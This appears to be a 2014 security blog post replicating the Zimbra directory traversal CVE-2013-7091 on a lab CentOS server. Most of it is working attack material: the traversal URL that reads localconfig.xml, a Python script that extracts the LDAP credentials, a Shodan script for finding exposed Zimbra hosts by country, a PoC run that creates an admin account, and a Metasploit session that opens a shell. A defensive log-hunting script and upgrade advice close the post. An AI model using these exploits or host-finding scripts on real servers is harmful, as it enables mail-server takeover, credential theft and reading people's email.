Archive for January, 2014

Replicating Zimbra exploit CVE-2013-7091

In this post I will quickly show how a remote attacker can use a Zimbra directory traversal vulnerability to take over a mail server and, from there, easily break into completely unrelated hosts on the internet.

Don't know what Zimbra is?

From Zimbra themselves:
Zimbra is an enterprise-class email, calendar and collaboration solution, built for the cloud, both public and private...

Read "What is Zimbra?" at http://www.zimbra.com/ for the rest, but in summary Zimbra helps you set up and manage an email server for your organization and its users without much hassle.

About the Vulnerability:

This vulnerability was discovered by rubina119 in early December 2013; to be precise, the disclosure date is 2013-12-06.

What does it involve?

Taken from the http://osvdb.org description:

Zimbra contains a flaw that may allow a remote attacker to execute arbitrary commands or code. The issue is due to /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz not properly sanitizing user input, specifically directory traversal style attacks (e.g., ../../) supplied to the ‘skin’ parameter. This may allow an attacker to include a file from the targeted host that contains arbitrary commands or code that will be executed by the vulnerable script. Such attacks are limited due to the script only calling files already on the target host. In addition, this flaw can potentially be used to disclose the contents of any file on the system accessible by the web server.

Enough with that. When I saw this I read somewhere (can't remember where) that it had been tested successfully on Ubuntu Server 12.04, so I decided to test whether it also works on CentOS.
The first step was a CentOS install on VirtualBox; I went for "CentOS-6.3-x86_64-LiveCD.iso".

# uname  -a
Linux localhost.localdomain 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
[root@localhost ~]# 

With CentOS up and running we can grab a vulnerable copy of Zimbra Collaboration Server (ZCS) from http://www.zimbra.com/

Note: there are several versions available, but the affected ones named in the advisory are 8.0.2 and 7.2.2.
Setting up ZCS is pretty easy, and if you run into problems the solutions are only a search away, for example:


http://www.howtoforge.com/installing-zimbra-collaboration-suite-7-on-centos-5.x-64bit

The Attack:
As documented in the original PoC, a remote attacker can read /opt/zimbra/conf/localconfig.xml, which holds the credentials of the Zimbra LDAP user (the "zimbra_user" and "zimbra_ldap_password" keys). With those credentials an attacker can create an admin user in Zimbra and upload files into "/opt/zimbra/jetty-distribution-7.6.2.z4/webapps/zimbra/downloads" (think of uploading malicious files and executing them).
When ZCS is running, users read their email in a browser by simply going to "mail.their-organisation.com", so to give the exploit a trial we simply visit the mail server IP and append:
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

For our lab box that is:

https://192.168.0.101/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

Note:
A Ctrl+F for "ldap_pass" in the returned file shows the Zimbra LDAP password in clear text.
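The same request as a small Python 3 checker, added here as an example (it is not part of the original post or of the rubina119 PoC): it builds the traversal URL exactly as shown above, fetches it, unpacks the body if it comes back gzip-compressed (the .zgz resource may be served that way, which a browser hides from you) and pulls the zimbra_user and zimbra_ldap_password keys out of localconfig.xml. The localconfig sample embedded for offline use is constructed, and the host, port and self-signed-certificate handling are assumptions for a lab box.

```python
#!/usr/bin/env python3
"""Check a Zimbra host for CVE-2013-7091 by reading localconfig.xml through
the skin-parameter traversal. Added example for this post, not the original
PoC. Only run it against hosts you are authorised to test."""
import gzip
import html
import io
import re
import ssl
import sys
import urllib.parse
import urllib.request

# Resource path and fixed "v" value as used in the PoC request quoted above.
LFI_PATH = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz"
LOCALCONFIG = "/opt/zimbra/conf/localconfig.xml"

# <key name="..."><value>...</value></key> entries of localconfig.xml
KEY_RE = re.compile(r'<key name="([^"]+)">\s*<value>(.*?)</value>', re.S)

# Constructed sample of what the traversal returns (not a real box's file).
SAMPLE_LOCALCONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<localconfig>
  <key name="zimbra_server_hostname">
    <value>mail.example.test</value>
  </key>
  <key name="zimbra_user">
    <value>zimbra</value>
  </key>
  <key name="zimbra_ldap_password">
    <value>s3cret-ldap-pw</value>
  </key>
</localconfig>
"""
# Same sample, gzip-compressed, to exercise the decoding path offline.
SAMPLE_GZ_BODY = gzip.compress(SAMPLE_LOCALCONFIG.encode("utf-8"))


def build_lfi_url(host, target_file=LOCALCONFIG, depth=9, port=443):
    """Traversal URL: `depth` "../" hops (9 is what the PoC request above and
    the Metasploit module's DEPTH use), the absolute file path, and a null
    byte so the ".js.zgz" suffix the servlet appends is cut off."""
    traversal = "../" * depth + target_file.lstrip("/")
    skin = urllib.parse.quote(traversal + "\x00", safe="/")   # "\x00" -> %00
    netloc = host if port == 443 else "%s:%d" % (host, port)
    return "https://%s%s?v=091214175450&skin=%s" % (netloc, LFI_PATH, skin)


def decode_body(body):
    """The .zgz resource may come back gzip-compressed (a browser undoes that
    transparently); unpack when the gzip magic is present, else use as-is."""
    if body[:2] == b"\x1f\x8b":
        body = gzip.GzipFile(fileobj=io.BytesIO(body)).read()
    return body.decode("utf-8", "replace")


def extract_localconfig(text, wanted=("zimbra_user", "zimbra_ldap_password")):
    """Pull the wanted keys out of localconfig.xml text. A regex rather than an
    XML parser so that junk before or after the file does not break it."""
    return {name: html.unescape(value)
            for name, value in KEY_RE.findall(text) if name in wanted}


def check_host(host, port=443, timeout=15):
    """Fetch localconfig.xml via the traversal; return the credentials found
    (an empty dict means the host did not hand the file over)."""
    url = build_lfi_url(host, port=port)
    # Lab installs use a self-signed certificate, so skip verification (assumption).
    ctx = ssl._create_unverified_context()
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
        body = resp.read()
    return extract_localconfig(decode_body(body))


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.0.101"
    found = check_host(target)
    if found:
        print("[+] %s is vulnerable, localconfig.xml readable:" % target)
        for key, value in found.items():
            print("    %s = %s" % (key, value))
    else:
        print("[-] %s: localconfig.xml not returned" % target)
```

Run it as `python3 zimbra_lfi_check.py 192.168.0.101`. An empty result on a host you know is vulnerable usually means the traversal depth is wrong for that install; change `depth` the same way you would change DEPTH in the Metasploit module.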

Risk:

At first glance many people will not see how this is a big issue, but as stated above this vulnerability lets an attacker take complete control of an organization's mail server: they create an administrator user, who can then read every user's email and send email under any address in the organization.
Again this might not seem like a problem to some people, but imagine an attacker who sends no email at all and simply searches every mailbox for juicy information.
In this day and age people still email credentials in clear text; if you don't believe it, search your own work mailbox for "password" or even "login".
Now think of a scenario where the organization in question is a hosting company or a local ISP. I know you can think of even more scenarios.

How can you become a target?

Finding these targets is more trivial than many people want to imagine: for example an attacker can use Shodan (http://www.shodanhq.com/). Many people know it already; if not, check it out. Simply put, Shodan is like Google for hackers.
With Shodan you can get an API key and write a simple Python script to grab the IPs of machines running Zimbra; you can even be more specific and pick a particular country by specifying its country code.
The Python script below lists the IPs of hosts running Zimbra, given a valid API key:

#a python script to search Shodan given a valid API key
#author: plast1k
#ref: shodan API reference (WebAPI class of the shodan 0.9.x library, Python 2)

from shodan import WebAPI

SHODAN_API_KEY = "XXXXX_a valid shodan API key here XXXXXX"

api = WebAPI(SHODAN_API_KEY)

# Wrap the request in a try/except block to catch errors (bad key, quota, network)
try:
    # Search Shodan; narrow to one country with country:"XX" (two-letter code)
    results = api.search('zimbra country:"country_code_here"')

    # Show the results
    print 'Results found: %s' % results['total']
    for result in results['matches']:
        print 'IP: %s' % result['ip']
        #print result['data']   # raw banner, uncomment to see what matched
        print ''
except Exception, e:
    print 'Error: %s' % e

#end

NB: to be able to import WebAPI you need the Python library for Shodan, which is easily installed with easy_install:


:~#  easy_install shodan
Searching for shodan
Best match: shodan 0.9.0
Processing shodan-0.9.0-py2.7.egg
shodan 0.9.0 is already the active version in easy-install.pth

Using /usr/local/lib/python2.7/dist-packages/shodan-0.9.0-py2.7.egg
Processing dependencies for shodan
Finished processing dependencies for shodan
:~# 

Case Study:

Using the Zimbra installation we set up, let us see how this vulnerability can be used to gain access to other hosts as well as a wealth of information.
First download the original PoC Ruby script from Packet Storm and extract it:


:~$ mkdir zimbra
:~$ cd zimbra
:~/zimbra$ wget http://packetstormsecurity.com/files/download/124321/zimbra-lfi.tgz
:~/zimbra$ tar -xvf zimbra-lfi.tgz 
zimbra-lfi.txt
run.rb
ultils.rb
:~/zimbra$ 

Then, assuming you have read through it, we try it against our target
(please don't try this on systems you don't own):


ruby run.rb  -t 192.168.0.101 -u zimbra -p nd7qw334sRRJFR

#########################################################################################
Zimbra Email Collaboration Server 0day Exploit by rubina119
#########################################################################################

[+] Looking if host is vuln...
[+] Host is vuln exploiting
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
[+] Login Credentials
    [*] Login URL : https://zimbra.chimera.co.ke:7071/zimbraAdmin/ 
    [*] Account   : zimbra@zimbra.chimera.co.ke
    [*] Password  : nd7qw334sRRJFR
[+] Successfully Exploited !

As you can see, an administrator user has been created on our target Zimbra server. Using these new credentials we simply browse to the Zimbra admin URL, usually https://server-ip:7071/zimbraAdmin/, and log in.

[screenshot: zim_login]

Right-clicking on Alice's account we can read all her emails, and a simple search for the word "password" finds that some time back she sent Bob an email with login details for another server.

[screenshot: search_password]

Final words:

This issue should not be ignored: it is critical, not minor as many would like to treat it, given the number of people running these versions of Zimbra on the internet.
It is also very important to note that the same flaw can be used to gain shell access to these systems, and there is even a Metasploit module that gives the attacker a shell instantly (see the Metasploit example below).


msf exploit(zimbra_lfi) > show options 

Module options (exploit/unix/webapp/zimbra_lfi):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      9                yes       Traversal depth until to reach the root path
   Proxies                     no        Use a proxy chain
   RHOST      192.168.0.101    yes       The target address
   RPORT      7071             yes       The target port
   TARGETURI  /zimbraAdmin     yes       Path to zimbraAdmin web application
   VHOST                       no        HTTP server virtual host
   ZIMBRADIR  /opt/zimbra      yes       Zimbra installation path on the target filesystem (/opt/zimbra by default)

Payload options (linux/x86/shell/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.0.101    no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Zimbra 8.0.2 / Linux

msf exploit(zimbra_lfi) > exploit 

[*] Started bind handler
[*] 192.168.0.101:7071 - Getting login credentials...
[+] 192.168.0.101:7071 - Got login credentials!
[*] 192.168.0.101:7071 - Getting auth token...
[+] 192.168.0.101:7071 - Got auth token!
[*] 192.168.0.101:7071 - Uploading payload
[*] 192.168.0.101:7071 - Uploading jsp stager
[*] 192.168.0.101:7071 - Executing payload on /downloads/pghMCARIa.jsp
[*] Sending stage (36 bytes) to 192.168.0.101
[*] Command shell session 1 opened (192.168.0.102:47679 -> 192.168.0.101:4444) at 2014-01-11 23:43:35 +0300
[+] Deleted ../jetty/webapps/zimbra/downloads/pghMCARIa.jsp
[+] Deleted ../jetty/webapps/zimbra/downloads/TfTXWDJInTRhCp

1126108370
desJMuxOIzwyyRgjsRoskoduIAaGetPB
yovsKBLRoOYhVpvWeiMypsPOkjOFaTBw
QXQQEVIhPpxBlHrtVYtmlwpPWMjcwfxc
uname -a
Linux localhost.localdomain 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux

So if you are a Zimbra admin, make the effort to upgrade.
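While the upgrade is pending, or to find out whether it came too late, the attack leaves two traces in the Jetty access log that are easy to hunt for: the traversal in the skin parameter of the .js.zgz resource (the request shown under "The Attack") and a JSP executed under /downloads/ (the stager the Metasploit session above ran as /downloads/pghMCARIa.jsp). The scanner below is an added example for this post, not a Zimbra or Metasploit tool; the log lines are constructed, and the log location and NCSA layout are assumptions about a default install.

```python
#!/usr/bin/env python3
"""Scan a Zimbra (Jetty) access log for the two traces the attack on this page
leaves behind. Added example for this post, not a Zimbra or Metasploit tool."""
import re
import sys
import urllib.parse

# NCSA-style line as Jetty writes it on a Zimbra box; the file is normally
# /opt/zimbra/log/access_log.<date> (assumption about a default install).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)')

# Constructed sample lines; the URLs mirror the requests shown on this page
# (/zimbraAdmin/res/... is the same resource reached via the admin webapp).
SAMPLE_LOG = """\
192.168.0.50 - - [11/Jan/2014:23:40:02 +0300] "GET /zimbra/ HTTP/1.1" 200 1284 "-" "Mozilla/5.0"
192.168.0.50 - - [11/Jan/2014:23:40:03 +0300] "GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=harmony HTTP/1.1" 200 93410 "-" "Mozilla/5.0"
192.168.0.102 - - [11/Jan/2014:23:43:31 +0300] "GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 4891 "-" "Mozilla/5.0"
192.168.0.102 - - [11/Jan/2014:23:43:32 +0300] "GET /zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=%2e%2e%2f%2e%2e%2f%2e%2e%2fopt%2fzimbra%2fconf%2flocalconfig.xml%00 HTTP/1.1" 200 4891 "-" "Mozilla/5.0"
192.168.0.102 - - [11/Jan/2014:23:43:35 +0300] "GET /downloads/pghMCARIa.jsp HTTP/1.1" 200 36 "-" "Mozilla/5.0"
"""


def classify_request(target):
    """Return the indicator names that apply to one request target (path+query)."""
    parsed = urllib.parse.urlsplit(target)
    path = urllib.parse.unquote(parsed.path)
    hits = []
    # Indicator 1: the vulnerable resource with a path, ".." or NUL in skin=.
    # A legitimate skin value is a bare skin name such as "harmony".
    if "/res/" in path and path.endswith("TemplateMsg.js.zgz"):
        params = urllib.parse.parse_qs(parsed.query, keep_blank_values=True)
        for skin in params.get("skin", []):
            skin = urllib.parse.unquote(skin)      # catch double encoding too
            if ".." in skin or "/" in skin or "\x00" in skin:
                hits.append("lfi_traversal_in_skin")
                break
    # Indicator 2: a JSP served from the downloads directory the exploit
    # writes into (the Metasploit stager path on this page).
    if re.search(r"/downloads/[^/]+\.jsp$", path):
        hits.append("jsp_under_downloads")
    return hits


def scan_log(lines):
    """Parse log lines and return one finding per suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify_request(m.group("target"))
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "status": int(m.group("status")),
                "indicators": hits,
                "target": m.group("target"),
            })
    return findings


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], errors="replace") as fh:
            lines = fh.read().splitlines()
    else:
        lines = SAMPLE_LOG.splitlines()     # demo on the constructed sample
    for f in scan_log(lines):
        print("%s %s %d %s %s" % (f["time"], f["ip"], f["status"],
                                  ",".join(f["indicators"]), f["target"]))
```

Point it at the access log with `python3 zimbra_log_hunt.py /opt/zimbra/log/access_log.2014-01-11`. A traversal request answered with 200 and a body of a few kilobytes means localconfig.xml was handed out, so treat the LDAP password as compromised and rotate it; a JSP hit under /downloads/ means code already ran on the box.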

Reference:

http://cvedetails.com/cve/2013-7091/
http://www.osvdb.org/100747
http://www.securityfocus.com/bid/64149
http://www.exploit-db.com/exploits/30085
http://cxsecurity.com/issue/WLB-2013120097
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/zimbra_lfi.rb